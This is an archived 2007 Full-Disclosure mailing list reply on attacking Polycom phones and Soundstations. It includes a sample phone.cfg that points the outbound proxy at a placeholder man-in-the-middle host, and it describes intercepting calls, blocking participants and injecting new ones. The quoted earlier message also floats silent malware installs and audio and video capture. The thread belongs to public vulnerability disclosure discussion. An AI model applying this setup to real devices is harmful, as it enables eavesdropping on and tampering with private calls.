Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Polycom hacking

from [J. Oquendo] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] Polycom hacking
Date: Tue, 26 Jun 2007 14:52:50 -0400
Paul Schmehl wrote:

Thanks. I'm not that interested in DoSes, but I'm thinking that you could mget the entire contents, alter them to your satisfaction and then mput them. Don't know how much memory these things have yet, but you ought to be able to iframe silent installs of malware, script the capture of all audio and video traffic from/to the device, etc. Could be quite interesting.


On that level you could just use a MITM proxy: phone.cfg (removed html brackets)

xml version="1.0" encoding="UTF-8" standalone="yes"
phone102
 reg
   reg.1.displayName="666"
   reg.1.address="666"
   reg.1.label="666"
   reg.1.type="private"
   reg.1.lcs=""
   reg.1.thirdPartyName=""
   reg.1.auth.userId="666"
   reg.1.auth.password="666"
   reg.1.server.1.address="original.server.ip"
   reg.1.server.1.port="5060"
   reg.1.server.1.transport="UDPonly"
   reg.1.server.1.expires="1800"
   reg.1.server.1.expires.overlap=""
   reg.1.server.1.register="1"
   reg.1.outboundProxy.address="man.in.the.middle.proxy"
   reg.1.outboundProxy.port="5060"
   reg.1.outboundProxy.transport=""
   reg.1.ringType="2"
   reg.1.lineKeys=""
   reg.1.callsPerLineKey=""

//  stripped the rest...

Where reg.1.server.1.address= points back at their PBX/H323
server. The problem with this would lie on the networking
side. Local without VLANs... Not a problem. Remotely, would
take some work but its doable. Polycoms are horrible when
it comes to doing network address translation and many set
them up in dirty DMZ's to get them to work.

Soundstations use the same XML files as the phones do. In sip.cfg:

outboundProxy voIpProt.SIP.outboundProxy.address="" voIpProt.SIP.outboundProxy.port="5060" voIpProt.SIP.outboundProxy.transport="DNSnaptr"

Obvious entries to fill... Would work like this:

Registration and subsequent connection(s):
Soundstation --> AttackerProxy --> RealServer

With AttackerProxy looking at traffic you could recompile data,
block hosts from the conference, inject new participants, etc.

====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 

"Wise men talk because they have something to say;
fools, because they have to say something." -- Plato


Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] iDefense Security Advisory 06.26.07: Multiple Vendor Kerberos kadmind Rename Principal Buffer Overflow Vulnerability, iDefense Labs
Next by Date:  [Full-disclosure] Calyptix Security Advisory CX-2007-04 - Cross-Site Request Forgery Attack Against Check Point Safe@Office Device, Calyptix Security
Previous by Thread:  Re: [Full-disclosure] Polycom hacking, Paul Schmehl
Next by Thread:  Re: [Full-disclosure] Polycom hacking, b . hines
Indexes:  [Date] [Thread] [Top] [All Lists]